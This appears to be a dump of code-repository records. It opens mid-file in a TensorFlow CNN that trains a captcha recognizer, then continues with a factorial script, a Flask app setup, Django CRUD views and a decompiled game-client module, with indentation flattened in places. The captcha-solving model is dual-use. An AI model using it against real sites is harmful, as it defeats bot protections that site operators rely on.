    h_conv1 = tf.nn.relu(conv2d(x_image, w_conv1) + b_conv1)  # ReLU activation
    h_pool1 = max_pool_2x2(h_conv1)  # pooling
    h_drop1 = tf.nn.dropout(h_pool1, keep_prob)  # dropout to reduce overfitting
    # second layer
w_conv2 = weight_variable([3, 3, 32, 64])
b_conv2 = bias_variable([64])
h_conv2 = tf.nn.relu(conv2d(h_drop1, w_conv2) + b_conv2)
h_pool2 = max_pool_2x2(h_conv2)
h_drop2 = tf.nn.dropout(h_pool2, keep_prob)
    # third layer
w_conv3 = weight_variable([3, 3, 64, 64])
b_conv3 = bias_variable([64])
h_conv3 = tf.nn.relu(conv2d(h_drop2, w_conv3) + b_conv3)
h_pool3 = max_pool_2x2(h_conv3)
h_drop3 = tf.nn.dropout(h_pool3, keep_prob)
"""
    Original 60*160 image: after conv1 60*160, after pool1 30*80;
    after conv2 30*80, after pool2 15*40;
    after conv3 15*40, after pool3 7.5*20 => rounded down to 7*20.
    The operations above leave a 7*20 feature plane.
"""
    # fully connected layer
image_height = int(h_drop3.shape[1])
image_width = int(h_drop3.shape[2])
    w_fc = weight_variable([image_height*image_width*64, 1024])  # previous layer has 64 channels; the fully connected layer has 1024 neurons
b_fc = bias_variable([1024])
h_drop3_re = tf.reshape(h_drop3, [-1, image_height*image_width*64])
h_fc = tf.nn.relu(tf.matmul(h_drop3_re, w_fc) + b_fc)
h_drop_fc = tf.nn.dropout(h_fc, keep_prob)
    # output layer
w_out = weight_variable([1024, len(captcha_list)*captcha_len])
b_out = bias_variable([len(captcha_list)*captcha_len])
y_conv = tf.matmul(h_drop_fc, w_out) + b_out
return y_conv
def optimize_graph(y, y_conv):
"""
    Build the training op.
    :param y: ground-truth labels
    :param y_conv: predictions
:return: optimizer
"""
    # cross-entropy loss; note that sigmoid is applied to the logits inside the function
    # sigmoid_cross_entropy suits labels that are independent but not mutually exclusive, e.g. an image may contain both letters and digits
    # softmax_cross_entropy suits mutually exclusive classes, where a digit and a letter cannot occupy the same position
loss = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(labels=y, logits=y_conv))
    # minimize the loss with the Adam optimizer
optimizer = tf.train.AdamOptimizer(1e-3).minimize(loss)
return optimizer
def accuracy_graph(y, y_conv, width=len(CAPTCHA_LIST), height=CAPTCHA_LEN):
"""
    Build the accuracy op from labels and predictions.
    :param y: ground-truth labels
    :param y_conv: predictions
    :param width: length of the captcha character list
    :param height: captcha length, 4 by default
    :return: accuracy
"""
    # case-sensitive here; real captchas usually are not; four positions per image, unlike single-digit handwriting recognition
    # predictions
    predict = tf.reshape(y_conv, [-1, height, width])
max_predict_idx = tf.argmax(predict, 2)
    # labels
label = tf.reshape(y, [-1, height, width])
max_label_idx = tf.argmax(label, 2)
    correct_p = tf.equal(max_predict_idx, max_label_idx)  # element-wise equality
accuracy = tf.reduce_mean(tf.cast(correct_p, tf.float32))
return accuracy
def train(height=CAPTCHA_HEIGHT, width=CAPTCHA_WIDTH, y_size=len(CAPTCHA_LIST)*CAPTCHA_LEN):
"""
    Train the CNN.
    :param height: captcha height
    :param width: captcha width
    :param y_size: length of the captcha character list * captcha length (4 by default)
:return:
"""
    # CNNs perform best when image sizes are multiples of 2; otherwise pad the edges with dummy pixels
    # e.g. pad 2 rows on top, 3 below, and 2 columns on each side:
# np.pad(image,((2,3),(2,2)), 'constant', constant_values=(255,))
    acc_rate = 0.95  # target accuracy before the model is saved
    # placeholders sized to the image
    x = tf.placeholder(tf.float32, [None, height * width])
    y = tf.placeholder(tf.float32, [None, y_size])
    # dropout keep probability: enabled (<1.0) during training, 1.0 during testing
keep_prob = tf.placeholder(tf.float32)
    # CNN model
    y_conv = cnn_graph(x, keep_prob, (height, width))
    # training op
    optimizer = optimize_graph(y, y_conv)
    # accuracy op
    accuracy = accuracy_graph(y, y_conv)
    # start the session and begin training
saver = tf.train.Saver()
sess = tf.Session()
    sess.run(tf.global_variables_initializer())  # initialize variables
    step = 0  # step counter
while 1:
batch_x, batch_y = get_next_batch(64)
sess.run(optimizer, feed_dict={x: batch_x, y: batch_y, keep_prob: 0.75})
        # evaluate every 100 training steps
if step % 100 == 0:
batch_x_test, batch_y_test = get_next_batch(100)
acc = sess.run(accuracy, feed_dict={x: batch_x_test, y: batch_y_test, keep_prob: 1.0})
print(datetime.now().strftime('%c'), ' step:', step, ' accuracy:', acc)
            # save the model once accuracy reaches the target
if acc > acc_rate:
model_path = "./model/captcha.model"
saver.save(sess, model_path, global_step=step)
acc_rate += 0.01
                if acc_rate > 0.99:  # stop once the accuracy bar reaches 99%
break
step += 1
sess.close()
if __name__ == '__main__':
train()
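# Hedged inference sketch (not part of the original file): rebuild the graph, restore
# the latest checkpoint written by train(), and predict one captcha. Assumes a fresh
# process so the training graph above has not already been built.
def predict(image_vector, height=CAPTCHA_HEIGHT, width=CAPTCHA_WIDTH):
    x = tf.placeholder(tf.float32, [None, height * width])
    keep_prob = tf.placeholder(tf.float32)
    y_conv = cnn_graph(x, keep_prob, (height, width))
    pred_idx = tf.argmax(tf.reshape(y_conv, [-1, CAPTCHA_LEN, len(CAPTCHA_LIST)]), 2)
    saver = tf.train.Saver()
    with tf.Session() as sess:
        saver.restore(sess, tf.train.latest_checkpoint('./model/'))
        return sess.run(pred_idx, feed_dict={x: [image_vector], keep_prob: 1.0})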
|
[
"dzr_job@163.com"
] |
dzr_job@163.com
|
ae8d871248e22663934a067a0893086a8d59a99e
|
7461c2d14236bd5bc50bd0a91dc682b1d1e44980
|
/Problem Set 3 Loop/3.3.6.factorial.py
|
59f1bb743bfe078de999ac7a091906f9474d3551
|
[] |
no_license
|
Jugal-Chanda/python
|
e4aece2eb3c16419be025cb79ff731321978ae3c
|
1549287fcfb2d2339cac79ba1e52f904a5dae07b
|
refs/heads/master
| 2021-09-10T09:14:15.884631
| 2018-03-23T10:55:54
| 2018-03-23T10:55:54
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 342
|
py
|
#find the factorial of a number
#Author Name : Jugal Kishore Chanda
print("\nAuthor Name : Jugal Kishore Chanda\n\n")
# this program is for finding factorial of a number
print("please input a number for factorial ",end="")
x = int(input())
fact = 1
for i in range(2,x+1):
fact=fact*i
print(f"The factorial of {x} is {fact}")
|
[
"noreply@github.com"
] |
Jugal-Chanda.noreply@github.com
|
8d12711a7c2803e51801c32746b622d5a4c04a8e
|
c051bafb897c69f3bdd0252709a0d63c0b9d1cca
|
/www.py
|
1c150527f1c2878ada0725977296464d48fa0423
|
[] |
no_license
|
IronPanda0/pethos
|
bdf08f9f777a199b33cc63b5f50002985c7a1b5a
|
3f359560d68c60d14aba24c4c04f66158cea522c
|
refs/heads/master
| 2023-04-09T11:43:07.167992
| 2021-04-02T16:30:32
| 2021-04-02T16:30:32
| 352,262,287
| 0
| 1
| null | 2021-04-19T02:30:54
| 2021-03-28T06:56:29
|
Vue
|
UTF-8
|
Python
| false
| false
| 1,060
|
py
|
from flask_sqlalchemy import SQLAlchemy
from init import *
from system.view import welcome
from system.testModule.question import question
from system.caseModule.case import case
from system.caseModule.animal import animal
from system.caseModule.category import category
from system.caseModule.disease import disease
from system.costModule.executes import executes
from system.costModule.consumables import consumables
from system.testModule.test import test
from flask_debugtoolbar import DebugToolbarExtension
from interceptor.errorHandler import *
from common.urlmanager import UrlManager
toolbar = DebugToolbarExtension(app)
# register blueprints
app.register_blueprint(welcome)
app.register_blueprint(question)
app.register_blueprint(case)
app.register_blueprint(animal)
app.register_blueprint(category)
app.register_blueprint(disease)
app.register_blueprint(executes)
app.register_blueprint(consumables)
app.register_blueprint(test)
app.add_template_global( UrlManager.buildStaticUrl,'buildStaticUrl' )
app.add_template_global( UrlManager.buildUrl,'buildUrl' )
|
[
"2632235311@qq.com"
] |
2632235311@qq.com
|
ca2a80d1d23ffb8ac32db9977cd08b406b4fc2d8
|
fc212767c6c838360b62a3dcd8030a1dfcbf62fc
|
/muddery/events/event_actions/action_message.py
|
c2917e6eefab1d69712c5a206e623b98a83b241a
|
[
"BSD-3-Clause"
] |
permissive
|
caibingcheng/muddery
|
24d6eba76358621736e6a3d66333361239c35472
|
dcbf55f4e1c18a2c69576fd0edcec4699c1519b9
|
refs/heads/master
| 2021-05-19T09:49:19.319735
| 2020-03-29T03:55:51
| 2020-03-29T03:55:51
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 967
|
py
|
"""
Event action.
"""
import random
from django.apps import apps
from django.conf import settings
from muddery.events.base_interval_action import BaseIntervalAction
from muddery.utils.localized_strings_handler import _
class ActionMessage(BaseIntervalAction):
"""
    Send a message to the character.
"""
key = "ACTION_MESSAGE"
name = _("Message", category="event_actions")
model_name = "action_message"
repeatedly = True
def func(self, event_key, character, obj):
"""
Send a message to the character.
Args:
event_key: (string) event's key.
character: (object) relative character.
obj: (object) the event object.
"""
# get action data
model_obj = apps.get_model(settings.WORLD_DATA_APP, self.model_name)
records = model_obj.objects.filter(event_key=event_key)
# send messages
for record in records:
character.msg(record.message)
|
[
"luyijun999@gmail.com"
] |
luyijun999@gmail.com
|
deecc2d8cc30d19df956fb3e1b6e5a9aeb4f7031
|
bb2c221ceea66ddd82387c4b40d4b04b6e1836aa
|
/Esoft/cadastro/views.py
|
6afbb14c7b07e4d6e706cbc1e5de38593ab3f007
|
[] |
no_license
|
diegobonani/Django
|
f583a2f3ef9ec665b2196c0ed2189f88fcdaac90
|
d2a95752224ec79e9c9804c66abf1104ef952368
|
refs/heads/main
| 2023-03-03T05:48:08.254754
| 2021-02-09T07:01:23
| 2021-02-09T07:01:23
| 337,309,631
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,714
|
py
|
from django.shortcuts import HttpResponse, render, redirect, get_object_or_404
from .models import CadastroPessoas
from .forms import RegistrarForms
import requests
def pessoasCadastradas(request):
data = CadastroPessoas.objects.all()
return render(request, 'pessoasCadastradas.html', {'data': data})
def paginaInicial(request):
api = requests.get('https://gerador-nomes.herokuapp.com/nome/aleatorio')
gereNome = api.json()
form = RegistrarForms(request.POST or None)
form.fields["nome"].initial = gereNome[0] + " " + gereNome[1]
form.fields['sobrenome'].initial = gereNome[2]
if form.is_valid():
try:
form.save()
return redirect('pessoasCadastradas')
except:
pass
return render(request, 'formulario.html', {'form': form})
def update_pessoas(request,id):
data = {}
cadastrao = CadastroPessoas.objects.get(id=id)
form = RegistrarForms(request.POST or None, instance=cadastrao)
if form.is_valid():
form.save()
return redirect('pessoasCadastradas')
return render(request, 'pessoasCadastradas.html', {'form':form , 'data':data})
def deletar_pessoas(request,id):
cadastrao = CadastroPessoas.objects.get(id=id)
cadastrao.delete()
return redirect('pessoasCadastradas')
'''
def registar(request):
if request.method == 'POST':
form = CadastroPessoas(request.POST)
if form.is_valid():
user = form.save()
user.save()
return redirect('/pessoas/')
else:
form = RegisterForm()
return render(request, 'formulario.html', {'register_form': form})
def pessoas_registradas(request):
registers = CadastroPessoas.objects.all()
if request.method == 'POST':
form = FilterForm(request.POST or None)
if form.is_valid():
context = {
'nome': request.POST['nome'],
'sobrenome': request.POST['sobrenome'],
'city': request.POST['city'],
}
if context['idade']:
age_choosed = re.sub("[''{ birthday: datetime.date()}]", '', context['age'])
age_choosed = re.sub('[,]', '-', age_choosed)
registers = CadastroPessoas.objects.filter(birthday=age_choosed)
elif context['city']:
registers = CadastroPessoas.objects.filter(city=form.cleaned_data.get('city'))
elif request.POST['gender']:
registers = CadastroPessoas.objects.filter(gender=form.cleaned_data.get('gender'))
else:
form = FilterForm()
return render(request, 'pessoasCadastradas.html', {'registers': registers, 'form_filter': form})
'''
|
[
"diego.bonani20@gmail.com"
] |
diego.bonani20@gmail.com
|
43c973225f1208537375399480ae546624b06c26
|
421a94f2c4c57366d1c61d80226060629f93ee93
|
/vagrant/tradyfit/app/__init__.py
|
70142dcae203d950355a051784e19130495261f0
|
[
"MIT"
] |
permissive
|
rosariomgomez/tradyfit
|
ae8c966f134acba1385a995d9c4bf8a4e48c7175
|
a61175729b70a194f874197848f1cbad1061e3d0
|
refs/heads/master
| 2020-12-24T13:52:46.311601
| 2015-05-07T21:05:13
| 2015-05-07T21:05:13
| 31,042,365
| 2
| 1
| null | 2015-04-19T22:27:39
| 2015-02-19T23:25:37
|
Python
|
UTF-8
|
Python
| false
| false
| 1,538
|
py
|
from flask import Flask
from flask.ext.bootstrap import Bootstrap
from flask_jsglue import JSGlue
from flask.ext.sqlalchemy import SQLAlchemy
from flask.ext.login import LoginManager
from flask.ext.moment import Moment
from flask_limiter import Limiter
from flask.ext.mobility import Mobility
from opbeat.contrib.flask import Opbeat
from config import config
import geonamescache
from geopy.geocoders import GoogleV3
bootstrap = Bootstrap()
db = SQLAlchemy()
moment = Moment()
gc = geonamescache.GeonamesCache()
geolocator = GoogleV3()
jsglue = JSGlue()
limiter = Limiter()
opbeat = Opbeat()
login_manager = LoginManager()
login_manager.login_view = 'main.index'
def create_app(config_name):
app = Flask(__name__)
app.config.from_object(config[config_name])
config[config_name].init_app(app)
bootstrap.init_app(app)
moment.init_app(app)
db.init_app(app)
login_manager.init_app(app)
jsglue.init_app(app)
limiter.init_app(app)
Mobility(app)
opbeat.init_app(app)
from .admin import admin as admin_blueprint
app.register_blueprint(admin_blueprint, url_prefix='/admin')
from .main import main as main_blueprint
app.register_blueprint(main_blueprint)
from .auth import auth as auth_blueprint
app.register_blueprint(auth_blueprint)
from .msg import msg as msg_blueprint
app.register_blueprint(msg_blueprint)
from .public_api_1_0 import public_api as public_api_1_0_blueprint
app.register_blueprint(public_api_1_0_blueprint,
url_prefix='/public-api/v1.0')
return app
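# Hedged usage sketch: the 'default' configuration key is an assumption; the real
# keys live in this project's config.py, which is not shown here.
if __name__ == '__main__':
    app = create_app('default')
    app.run(debug=True)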
|
[
"rosario.mgomez@gmail.com"
] |
rosario.mgomez@gmail.com
|
2b38f756de000137ddfe4d824dbe8a15a7426bf0
|
77311ad9622a7d8b88707d7cee3f44de7c8860cb
|
/res/scripts/client/gui/shared/fortifications/context.py
|
5e9d38fbfb87ce72169db08d58c8b43d18c10d4e
|
[] |
no_license
|
webiumsk/WOT-0.9.14-CT
|
9b193191505a4560df4e872e022eebf59308057e
|
cfe0b03e511d02c36ce185f308eb48f13ecc05ca
|
refs/heads/master
| 2021-01-10T02:14:10.830715
| 2016-02-14T11:59:59
| 2016-02-14T11:59:59
| 51,606,676
| 0
| 0
| null | null | null | null |
WINDOWS-1250
|
Python
| false
| false
| 15,527
|
py
|
# 2016.02.14 12:41:26 Střední Evropa (běžný čas)
# Embedded file name: scripts/client/gui/shared/fortifications/context.py
from constants import REQUEST_COOLDOWN, PREBATTLE_TYPE
from gui.prb_control.context import PrbCtrlRequestCtx
from gui.prb_control import settings as prb_settings
from gui.prb_control.prb_getters import getUnitIdx
from gui.shared.fortifications.settings import FORT_REQUEST_TYPE
from gui.shared.utils.decorators import ReprInjector
from gui.shared.utils.requesters import RequestCtx
@ReprInjector.withParent(('__isUpdateExpected', 'isUpdateExpected'))
class FortRequestCtx(RequestCtx):
def __init__(self, waitingID = '', isUpdateExpected = False):
super(FortRequestCtx, self).__init__(waitingID)
self.__isUpdateExpected = isUpdateExpected
def isUpdateExpected(self):
return self.__isUpdateExpected
def getCooldown(self):
return REQUEST_COOLDOWN.CALL_FORT_METHOD
def _setUpdateExpected(self, value):
self.__isUpdateExpected = value
class CreateFortCtx(FortRequestCtx):
def __init__(self, waitingID = ''):
super(CreateFortCtx, self).__init__(waitingID, True)
def getRequestType(self):
return FORT_REQUEST_TYPE.CREATE_FORT
class DeleteFortCtx(FortRequestCtx):
def __init__(self, waitingID = ''):
super(DeleteFortCtx, self).__init__(waitingID, True)
def getRequestType(self):
return FORT_REQUEST_TYPE.DELETE_FORT
@ReprInjector.withParent(('__direction', 'direction'), ('__isOpen', 'isOpen'))
class DirectionCtx(FortRequestCtx):
def __init__(self, direction, isOpen = True, waitingID = ''):
super(DirectionCtx, self).__init__(waitingID, True)
self.__direction = direction
self.__isOpen = isOpen
def getRequestType(self):
if self.__isOpen:
return FORT_REQUEST_TYPE.OPEN_DIRECTION
return FORT_REQUEST_TYPE.CLOSE_DIRECTION
def getDirection(self):
return self.__direction
@ReprInjector.withParent(('__buildingTypeID', 'buildingTypeID'), ('__direction', 'direction'), ('__position', 'position'), ('__isAdd', 'isAdd'))
class BuildingCtx(FortRequestCtx):
def __init__(self, buildingTypeID, direction = None, position = None, isAdd = True, waitingID = ''):
super(BuildingCtx, self).__init__(waitingID, True)
self.__buildingTypeID = buildingTypeID
self.__direction = direction
self.__position = position
self.__isAdd = isAdd
def getRequestType(self):
if self.__isAdd:
return FORT_REQUEST_TYPE.ADD_BUILDING
return FORT_REQUEST_TYPE.DELETE_BUILDING
def getDirection(self):
return self.__direction
def getPosition(self):
return self.__position
def getBuildingTypeID(self):
return self.__buildingTypeID
@ReprInjector.withParent(('__fromBuildingTypeID', 'fromBuildingTypeID'), ('__toBuildingTypeID', 'toBuildingTypeID'), ('__resCount', 'resCount'))
class TransportationCtx(FortRequestCtx):
def __init__(self, fromBuildingTypeID, toBuildingTypeID, resCount, waitingID = ''):
super(TransportationCtx, self).__init__(waitingID, True)
self.__fromBuildingTypeID = fromBuildingTypeID
self.__toBuildingTypeID = toBuildingTypeID
self.__resCount = resCount
def getRequestType(self):
return FORT_REQUEST_TYPE.TRANSPORTATION
def getFromBuildingTypeID(self):
return self.__fromBuildingTypeID
def getToBuildingTypeID(self):
return self.__toBuildingTypeID
def getResCount(self):
return self.__resCount
@ReprInjector.withParent(('__orderTypeID', 'orderTypeID'), ('__count', 'count'), ('__isAdd', 'isAdd'))
class OrderCtx(FortRequestCtx):
def __init__(self, orderTypeID, count = 1, isAdd = True, waitingID = ''):
super(OrderCtx, self).__init__(waitingID, True)
self.__orderTypeID = orderTypeID
self.__count = count
self.__isAdd = isAdd
def getRequestType(self):
if self.__isAdd:
return FORT_REQUEST_TYPE.ADD_ORDER
return FORT_REQUEST_TYPE.ACTIVATE_ORDER
def getOrderTypeID(self):
return self.__orderTypeID
def getCount(self):
return self.__count
@ReprInjector.withParent(('__buildingTypeID', 'buildingTypeID'))
class AttachCtx(FortRequestCtx):
def __init__(self, buildingTypeID, waitingID = ''):
super(AttachCtx, self).__init__(waitingID, True)
self.__buildingTypeID = buildingTypeID
def getRequestType(self):
return FORT_REQUEST_TYPE.ATTACH
def getBuildingTypeID(self):
return self.__buildingTypeID
@ReprInjector.withParent(('__buildingTypeID', 'buildingTypeID'))
class UpgradeCtx(FortRequestCtx):
def __init__(self, buildingTypeID, waitingID = ''):
super(UpgradeCtx, self).__init__(waitingID, True)
self.__buildingTypeID = buildingTypeID
def getRequestType(self):
return FORT_REQUEST_TYPE.UPGRADE
def getBuildingTypeID(self):
return self.__buildingTypeID
@ReprInjector.withParent(('__divisionLevel', 'divisionLevel'))
class CreateSortieCtx(FortRequestCtx):
def __init__(self, divisionLevel = 10, waitingID = ''):
super(CreateSortieCtx, self).__init__(waitingID)
self.__divisionLevel = divisionLevel
def getRequestType(self):
return FORT_REQUEST_TYPE.CREATE_SORTIE
def getDivisionLevel(self):
return self.__divisionLevel
def __repr__(self):
return 'CreateSortieCtx(buildingTypeID={0:n}, waitingID={1:>s})'.format(self.__divisionLevel, self.getWaitingID())
@ReprInjector.withParent(('__unitMgrID', 'unitMgrID'), ('__peripheryID', 'peripheryID'))
class RequestSortieUnitCtx(FortRequestCtx):
def __init__(self, unitMgrID, peripheryID, waitingID = ''):
super(RequestSortieUnitCtx, self).__init__(waitingID)
self.__unitMgrID = unitMgrID
self.__peripheryID = peripheryID
def getRequestType(self):
return FORT_REQUEST_TYPE.REQUEST_SORTIE_UNIT
def getCooldown(self):
return REQUEST_COOLDOWN.GET_FORT_SORTIE_DATA
def getUnitMgrID(self):
return self.__unitMgrID
def getPeripheryID(self):
return self.__peripheryID
def __repr__(self):
return 'RequestSortieUnitCtx(unitMgrID={0:n}, peripheryID={1:n}, waitingID={2:>s})'.format(self.__unitMgrID, self.__peripheryID, self.getWaitingID())
@ReprInjector.withParent(('_defenceHour', 'defenceHour'))
class DefenceHourCtx(FortRequestCtx):
def __init__(self, defenceHour, waitingID = ''):
super(DefenceHourCtx, self).__init__(waitingID)
self._defenceHour = defenceHour
def getRequestType(self):
return FORT_REQUEST_TYPE.CHANGE_DEF_HOUR
def getDefenceHour(self):
return self._defenceHour
@ReprInjector.withParent(('_offDay', 'offDay'))
class OffDayCtx(FortRequestCtx):
def __init__(self, offDay, waitingID = ''):
super(OffDayCtx, self).__init__(waitingID)
self._offDay = offDay
def getRequestType(self):
return FORT_REQUEST_TYPE.CHANGE_OFF_DAY
def getOffDay(self):
return self._offDay
@ReprInjector.withParent(('_peripheryID', 'peripheryID'))
class PeripheryCtx(FortRequestCtx):
def __init__(self, peripheryID, waitingID = ''):
super(PeripheryCtx, self).__init__(waitingID)
self._peripheryID = peripheryID
def getRequestType(self):
return FORT_REQUEST_TYPE.CHANGE_PERIPHERY
def getPeripheryID(self):
return self._peripheryID
@ReprInjector.withParent(('_timeVacationStart', 'timeVacationStart'), ('_vacationDuration', 'vacationDuration'))
class VacationCtx(FortRequestCtx):
def __init__(self, timeVacationStart, vacationDuration, waitingID = ''):
super(VacationCtx, self).__init__(waitingID)
self._timeVacationStart = timeVacationStart
self._vacationDuration = vacationDuration
def getRequestType(self):
return FORT_REQUEST_TYPE.CHANGE_VACATION
def getTimeVacationStart(self):
return self._timeVacationStart
def getTimeVacationEnd(self):
return self.getTimeVacationStart() + self.getTimeVacationDuration()
def getTimeVacationDuration(self):
return self._vacationDuration
class SettingsCtx(DefenceHourCtx, OffDayCtx, PeripheryCtx):
def __init__(self, defenceHour, offDay, peripheryID, waitingID = ''):
DefenceHourCtx.__init__(self, defenceHour, waitingID)
OffDayCtx.__init__(self, offDay, waitingID)
PeripheryCtx.__init__(self, peripheryID, waitingID)
def getRequestType(self):
return FORT_REQUEST_TYPE.CHANGE_SETTINGS
@ReprInjector.withParent(('_shutDown', 'shutDown'))
class DefencePeriodCtx(FortRequestCtx):
def __init__(self, shutDown = True, waitingID = ''):
super(DefencePeriodCtx, self).__init__(waitingID)
self._shutDown = shutDown
def getRequestType(self):
if self._shutDown:
return FORT_REQUEST_TYPE.SHUTDOWN_DEF_HOUR
else:
return FORT_REQUEST_TYPE.CANCEL_SHUTDOWN_DEF_HOUR
@ReprInjector.withParent(('_filterType', 'filterType'), ('_abbrevPattern', 'abbrevPattern'), ('_limit', 'limit'), ('_lvlFrom', 'lvlFrom'), ('_lvlTo', 'lvlTo'), ('_extStartDefHourFrom', 'extStartDefHourFrom'), ('_extStartDefHourTo', 'extStartDefHourTo'), ('_attackDay', 'attackDay'), ('_firstDefaultQuery', 'firstDefaultQuery'), ('getWaitingID', 'waitingID'))
class FortPublicInfoCtx(FortRequestCtx):
def __init__(self, filterType, abbrevPattern, limit, lvlFrom, lvlTo, extStartDefHourFrom, extStartDefHourTo, attackDay, firstDefaultQuery = False, waitingID = ''):
super(FortPublicInfoCtx, self).__init__(waitingID)
self._filterType = filterType
self._abbrevPattern = abbrevPattern
self._limit = limit
self._lvlFrom = lvlFrom
self._lvlTo = lvlTo
self._extStartDefHourFrom = extStartDefHourFrom
self._extStartDefHourTo = extStartDefHourTo
self._attackDay = attackDay
self._firstDefaultQuery = firstDefaultQuery
def getRequestType(self):
return FORT_REQUEST_TYPE.REQUEST_PUBLIC_INFO
def getCooldown(self):
return REQUEST_COOLDOWN.REQUEST_FORT_PUBLIC_INFO
def getFilterType(self):
return self._filterType
def getAbbrevPattern(self):
return self._abbrevPattern
def getLimit(self):
return self._limit
def getLvlFrom(self):
return self._lvlFrom
def getLvlTo(self):
return self._lvlTo
def getStartDefHourFrom(self):
return self._extStartDefHourFrom
def getStartDefHourTo(self):
return self._extStartDefHourTo
def getAttackDay(self):
return self._attackDay
def isFirstDefaultQuery(self):
return self._firstDefaultQuery
@ReprInjector.withParent(('__clanDBID', 'clanDBID'))
class RequestClanCardCtx(FortRequestCtx):
def __init__(self, clanDBID, waitingID = ''):
super(RequestClanCardCtx, self).__init__(waitingID)
self.__clanDBID = clanDBID
def getRequestType(self):
return FORT_REQUEST_TYPE.REQUEST_CLAN_CARD
def getClanDBID(self):
return self.__clanDBID
def __repr__(self):
return 'RequestClanCardCtx(clanDBID={0:n}, waitingID={1:>s})'.format(self.__clanDBID, self.getWaitingID())
@ReprInjector.withParent(('__clanDBID', 'clanDBID'), ('__isAdd', 'isAdd'))
class FavoriteCtx(FortRequestCtx):
def __init__(self, clanDBID, isAdd = True, waitingID = ''):
super(FavoriteCtx, self).__init__(waitingID)
self.__clanDBID = clanDBID
self.__isAdd = isAdd
def getClanDBID(self):
return self.__clanDBID
def getRequestType(self):
if self.__isAdd:
return FORT_REQUEST_TYPE.ADD_FAVORITE
else:
return FORT_REQUEST_TYPE.REMOVE_FAVORITE
@ReprInjector.withParent(('__clanDBID', 'clanDBID'), ('__timeAttack', 'timeAttack'), ('__dirFrom', 'dirFrom'), ('__dirTo', 'dirTo'))
class AttackCtx(FortRequestCtx):
def __init__(self, clanDBID, timeAttack, dirFrom, dirTo, waitingID = ''):
super(AttackCtx, self).__init__(waitingID)
self.__clanDBID = clanDBID
self.__timeAttack = timeAttack
self.__dirFrom = dirFrom
self.__dirTo = dirTo
def getClanDBID(self):
return self.__clanDBID
def getTimeAttack(self):
return self.__timeAttack
def getDirFrom(self):
return self.__dirFrom
def getDirTo(self):
return self.__dirTo
def getRequestType(self):
return FORT_REQUEST_TYPE.PLAN_ATTACK
@ReprInjector.withParent(('__battleID', 'battleID'), ('__slotIdx', 'slotIdx'))
class CreateOrJoinFortBattleCtx(PrbCtrlRequestCtx):
__slots__ = ('__battleID', '__slotIdx', '__isUpdateExpected')
def __init__(self, battleID, slotIdx = -1, waitingID = '', isUpdateExpected = False, flags = prb_settings.FUNCTIONAL_FLAG.UNDEFINED):
super(CreateOrJoinFortBattleCtx, self).__init__(ctrlType=prb_settings.CTRL_ENTITY_TYPE.UNIT, entityType=PREBATTLE_TYPE.FORT_BATTLE, waitingID=waitingID, flags=flags, isForced=True)
self.__battleID = battleID
self.__slotIdx = slotIdx
self.__isUpdateExpected = isUpdateExpected
def isUpdateExpected(self):
return self.__isUpdateExpected
def getCooldown(self):
return REQUEST_COOLDOWN.CALL_FORT_METHOD
def getUnitIdx(self):
return getUnitIdx()
def getRequestType(self):
return FORT_REQUEST_TYPE.CREATE_OR_JOIN_FORT_BATTLE
def getID(self):
return self.__battleID
def getSlotIdx(self):
return self.__slotIdx
def _setUpdateExpected(self, value):
self.__isUpdateExpected = value
@ReprInjector.withParent(('__consumableOrderTypeID', 'consumableOrderTypeID'), ('__slotIdx', 'slotIdx'))
class ActivateConsumableCtx(FortRequestCtx):
def __init__(self, consumableOrderTypeID, slotIdx, waitingID = ''):
super(ActivateConsumableCtx, self).__init__(waitingID)
self.__consumableOrderTypeID = consumableOrderTypeID
self.__slotIdx = slotIdx
def getConsumableOrderTypeID(self):
return self.__consumableOrderTypeID
def getSlotIdx(self):
return self.__slotIdx
def getRequestType(self):
return FORT_REQUEST_TYPE.ACTIVATE_CONSUMABLE
@ReprInjector.withParent(('__consumableOrderTypeID', 'consumableOrderTypeID'))
class ReturnConsumableCtx(FortRequestCtx):
def __init__(self, consumableOrderTypeID, waitingID = ''):
super(ReturnConsumableCtx, self).__init__(waitingID)
self.__consumableOrderTypeID = consumableOrderTypeID
def getConsumableOrderTypeID(self):
return self.__consumableOrderTypeID
def getRequestType(self):
return FORT_REQUEST_TYPE.RETURN_CONSUMABLE
__all__ = ('FortRequestCtx', 'CreateFortCtx', 'DeleteFortCtx', 'DirectionCtx', 'BuildingCtx', 'TransportationCtx', 'OrderCtx', 'AttachCtx', 'OrderCtx', 'UpgradeCtx', 'CreateSortieCtx', 'RequestSortieUnitCtx', 'DefenceHourCtx', 'OffDayCtx', 'PeripheryCtx', 'VacationCtx', 'SettingsCtx', 'FortPublicInfoCtx', 'RequestClanCardCtx', 'FavoriteCtx', 'CreateOrJoinFortBattleCtx', 'ActivateConsumableCtx', 'ReturnConsumableCtx')
# okay decompyling c:\Users\PC\wotsources\files\originals\res\scripts\client\gui\shared\fortifications\context.pyc
# decompiled 1 files: 1 okay, 0 failed, 0 verify failed
# 2016.02.14 12:41:26 Střední Evropa (běžný čas)
|
[
"info@webium.sk"
] |
info@webium.sk
|